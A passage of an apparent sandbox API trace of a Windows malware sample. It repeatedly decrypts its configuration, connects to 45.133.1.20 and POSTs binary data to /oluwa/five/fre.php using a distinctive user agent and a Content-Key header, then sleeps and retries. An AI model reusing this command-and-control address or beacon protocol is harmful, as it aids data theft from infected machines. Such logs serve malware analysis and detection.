Flags=0x0, Size=0x212) returned 0x6a8658 [0275.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.874] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0275.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.875] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0275.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.878] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0275.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.883] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0275.883] GetProcessHeap () returned 0x6a0000 [0275.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0275.883] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0275.883] GetProcessHeap () returned 0x6a0000 [0275.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0275.883] socket (af=2, type=1, protocol=6) returned 0x9dc [0275.884] connect (s=0x9dc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0275.916] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0275.916] GetProcessHeap () returned 0x6a0000 [0275.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0275.916] GetProcessHeap () returned 0x6a0000 [0275.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0275.917] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.918] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.918] GetProcessHeap () returned 0x6a0000 [0275.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ab0 [0275.918] GetProcessHeap () returned 0x6a0000 [0275.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.919] GetProcessHeap () returned 0x6a0000 [0275.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0275.919] GetProcessHeap () returned 0x6a0000 [0275.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0275.920] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.920] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.920] GetProcessHeap () returned 0x6a0000 [0275.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0275.920] GetProcessHeap () returned 0x6a0000 [0275.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.921] send (s=0x9dc, buf=0x6bd460*, len=242, flags=0) returned 242 [0275.921] send (s=0x9dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0275.922] GetProcessHeap () returned 0x6a0000 [0275.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0275.922] recv (in: s=0x9dc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0276.032] GetProcessHeap () returned 0x6a0000 [0276.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0276.033] GetProcessHeap () returned 0x6a0000 [0276.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0276.033] GetProcessHeap () returned 0x6a0000 [0276.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ab0 | out: hHeap=0x6a0000) returned 1 [0276.033] GetProcessHeap () returned 0x6a0000 [0276.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0276.034] closesocket (s=0x9dc) returned 0 [0276.034] GetProcessHeap () returned 0x6a0000 [0276.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0276.034] GetProcessHeap () returned 0x6a0000 [0276.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.035] GetProcessHeap () returned 0x6a0000 [0276.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0276.035] GetProcessHeap () returned 0x6a0000 [0276.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0276.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1770) returned 0x9dc [0276.037] Sleep (dwMilliseconds=0xea60) [0276.039] GetProcessHeap () returned 0x6a0000 [0276.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0276.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.040] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.047] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0276.055] GetProcessHeap () returned 0x6a0000 [0276.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0276.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.056] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0276.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.061] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.062] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.062] GetProcessHeap () returned 0x6a0000 [0276.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0276.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.067] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0276.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.068] CryptDestroyKey (hKey=0x6ad560) returned 1 [0276.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.070] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0276.070] GetProcessHeap () returned 0x6a0000 [0276.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.072] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.073] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.077] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.078] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.078] GetProcessHeap () returned 0x6a0000 [0276.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0276.078] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.078] GetProcessHeap () returned 0x6a0000 [0276.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0276.079] GetProcessHeap () returned 0x6a0000 [0276.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.080] GetProcessHeap () returned 0x6a0000 [0276.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0276.080] GetProcessHeap () returned 0x6a0000 [0276.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0276.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.081] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0276.096] GetProcessHeap () returned 0x6a0000 [0276.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0276.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.099] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0276.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.101] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.102] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.102] GetProcessHeap () returned 0x6a0000 [0276.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0276.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.104] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0276.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.105] CryptDestroyKey (hKey=0x6ad020) returned 1 [0276.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.106] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0276.106] GetProcessHeap () returned 0x6a0000 [0276.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.111] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0276.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.112] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0276.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.114] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0276.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.115] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0276.115] GetProcessHeap () returned 0x6a0000 [0276.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0276.115] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0276.115] GetProcessHeap () returned 0x6a0000 [0276.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0276.115] socket (af=2, type=1, protocol=6) returned 0x9e0 [0276.116] connect (s=0x9e0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0276.143] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0276.143] GetProcessHeap () returned 0x6a0000 [0276.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0276.143] GetProcessHeap () returned 0x6a0000 [0276.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0276.144] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.179] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.180] GetProcessHeap () returned 0x6a0000 [0276.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba830 [0276.180] GetProcessHeap () returned 0x6a0000 [0276.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.182] GetProcessHeap () returned 0x6a0000 [0276.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0276.183] GetProcessHeap () returned 0x6a0000 [0276.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0276.183] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.187] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.187] GetProcessHeap () returned 0x6a0000 [0276.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0276.187] GetProcessHeap () returned 0x6a0000 [0276.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.188] send (s=0x9e0, buf=0x6bd460*, len=242, flags=0) returned 242 [0276.189] send (s=0x9e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0276.189] GetProcessHeap () returned 0x6a0000 [0276.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0276.189] recv (in: s=0x9e0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0276.259] GetProcessHeap () returned 0x6a0000 [0276.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0276.262] GetProcessHeap () returned 0x6a0000 [0276.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0276.263] GetProcessHeap () returned 0x6a0000 [0276.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba830 | out: hHeap=0x6a0000) returned 1 [0276.263] GetProcessHeap () returned 0x6a0000 [0276.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0276.264] closesocket (s=0x9e0) returned 0 [0276.264] GetProcessHeap () returned 0x6a0000 [0276.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0276.264] GetProcessHeap () returned 0x6a0000 [0276.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.266] GetProcessHeap () returned 0x6a0000 [0276.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0276.266] GetProcessHeap () returned 0x6a0000 [0276.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0276.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1774) returned 0x9e0 [0276.269] Sleep (dwMilliseconds=0xea60) [0276.271] GetProcessHeap () returned 0x6a0000 [0276.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0276.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.273] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0276.293] GetProcessHeap () returned 0x6a0000 [0276.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0276.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.294] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0276.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.295] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.297] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.297] GetProcessHeap () returned 0x6a0000 [0276.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0276.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.299] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0276.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.300] CryptDestroyKey (hKey=0x6ad020) returned 1 [0276.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.311] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0276.311] GetProcessHeap () returned 0x6a0000 [0276.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.312] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.314] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.315] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.316] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.316] GetProcessHeap () returned 0x6a0000 [0276.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0276.316] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.319] GetProcessHeap () returned 0x6a0000 [0276.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0276.320] GetProcessHeap () returned 0x6a0000 [0276.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.320] GetProcessHeap () returned 0x6a0000 [0276.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0276.321] GetProcessHeap () returned 0x6a0000 [0276.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0276.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.322] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.332] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0276.341] GetProcessHeap () returned 0x6a0000 [0276.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0276.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.342] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0276.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.343] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.345] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.345] GetProcessHeap () returned 0x6a0000 [0276.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0276.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.346] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0276.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.348] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0276.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.352] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0276.352] GetProcessHeap () returned 0x6a0000 [0276.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.354] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0276.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.355] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0276.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.357] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0276.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.358] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0276.358] GetProcessHeap () returned 0x6a0000 [0276.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0276.358] getaddrinfo (in: pNodeName="45.133.1.20", 